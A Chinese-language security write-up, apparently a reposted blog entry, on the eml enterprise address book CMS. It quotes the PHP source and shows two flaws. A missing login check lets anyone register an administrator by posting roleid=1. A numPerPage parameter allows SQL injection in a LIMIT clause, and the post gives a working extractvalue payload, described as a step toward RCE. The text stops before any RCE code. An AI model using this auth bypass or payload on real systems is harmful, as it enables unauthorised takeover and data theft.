[PHP知识库] eml企业通讯录管理系统sql注入+逻辑缺陷组合拳进行RCE

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> eml企业通讯录管理系统sql注入+逻辑缺陷组合拳进行RCE -> 正文阅读

[PHP知识库]eml企业通讯录管理系统sql注入+逻辑缺陷组合拳进行RCE

挺简单的一个cms，源码内容很少，主要逻辑都在这几个文件里
在这里插入图片描述

逻辑缺陷

整个系统没有检验用户是否登录，所以无需登录即可实现管理员所有功能
在action.user.php里

//写入
if($do=="add"){
	$username = _RunMagicQuotes($_POST[username]);
    $name = _RunMagicQuotes($_POST[name]);
	$sex = _RunMagicQuotes($_POST[sex]);
	$tel = _RunMagicQuotes($_POST[tel]);
	$phone = _RunMagicQuotes($_POST[phone]);
	$email = _RunMagicQuotes($_POST[email]);
	$qq = _RunMagicQuotes($_POST[qq]);
	$deparyment = _RunMagicQuotes($_POST[deparyment]);
	$position = _RunMagicQuotes($_POST[position]);
	$address = _RunMagicQuotes($_POST[address]);
	$roleid = _RunMagicQuotes($_POST[roleid]);
	//使用token验证可有效的防止非法来源数据提交访问，增加数据操作的安全性
	$module = _RunMagicQuotes($_POST['module']);
	$timestamp = _RunMagicQuotes($_POST['timestamp']);
	$token = _RunMagicQuotes(md5($module.'#$@%!^*'.$timestamp));

	if($token != $_POST['token']){
	 echo('非法数据来源');
	 exit();
	}
	//If_rabc($action,$do); //检测权限
	$created_at=date("Y-m-d H:i:s", time());
	$password=md5($_POST[password]);
	$areaid=implode(',',$_POST[areaid]);
	//查询
	$sql="SELECT * FROM `eml_user` where username ='$username' LIMIT 1";
	$db->query($sql);
	if($db->fetchRow()){echo  "<script>alert(\"用户名已存在!\");window.location=\"index.php?action=user&do=reg\";</script>";exit();}
	$created_at = time();
	$sql="INSERT INTO `eml_user` (`id` ,`username` ,`password` ,`name` ,`sex` ,`phone` ,`tel` ,`email` ,`qq` ,`deparyment` ,`position` ,`address` ,`roleid`,`created_at` )
	VALUES ('$id','$username', '$password', '$name','$sex','$phone','$tel','$email','$qq','$deparyment','$position','$address','$roleid','$created_at');";
	//die($sql);
	if($db->query($sql)){echo success($msg,"?action=user");}else{echo error($msg);}
	exit;
}

这里是一个注册用户的模块，roleid参数控制了权限，为1是注册管理员，直接对着源码的逻辑发包即可
`http://url/index.php?action=user&do=add&id=2
在这里插入图片描述

这里我注册了一个用户名为fmyyy，密码为123456的管理员
在这里插入图片描述
提示操作成功
登录

登陆成功在用户管理处找到刚刚注册的管理员

sql注入

这个系统的注入非常有限，只能注到一些基本信息。
同样是刚刚的文件，该系统对参数都有严格的转义，唯独有一处没有

if($do==""){
	If_rabc($action,$do); //检测权限
	is_admin($action,$do); //检测权限
	$kewords = _RunMagicQuotes($_POST['kewords']);
	if($kewords){$search .= " and username like '%".strip_tags($kewords)."%'";}			
	if($_POST['time_start']!="" && $_POST['time_over']!=""){
		$search .= " and `created_at` >  '".strtotime($_POST[time_start]." 00:00:00")."' AND  `created_at` <  '".strtotime($_POST[time_over] ." 23:59:59")."'";
	}
	
	//设置分页
	if($_POST[numPerPage]==""){$numPerPage="10";}else{$numPerPage=$_POST[numPerPage];}
	if($_GET[pageNum]==""||$_GET[pageNum]=="0" ){$pageNum="0";}else{$pageNum=($_GET[pageNum]-1)*$numPerPage;}
	$num=mysql_query("SELECT * FROM eml_user where 1=1 $search");//当前频道条数
	$total=mysql_num_rows($num);//总条数	
	$page=new page(array('total'=>$total,'perpage'=>$numPerPage));

	//查询
	$sql="SELECT * FROM eml_user  where 1=1 $search order by id desc LIMIT $pageNum,$numPerPage";//注入点！！！！！！！
	
	$db->query($sql);
	$list=$db->fetchAll();

这里post的numPerPage参数直接拼接到limit之后。
limit后面能跟的函数只有into和procedure payload:
index.php?action=user&pageNum=1
post参数
numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,user())));
可以用上面的payload查看用户是否有写入权限，如果有，那就到了下一步rce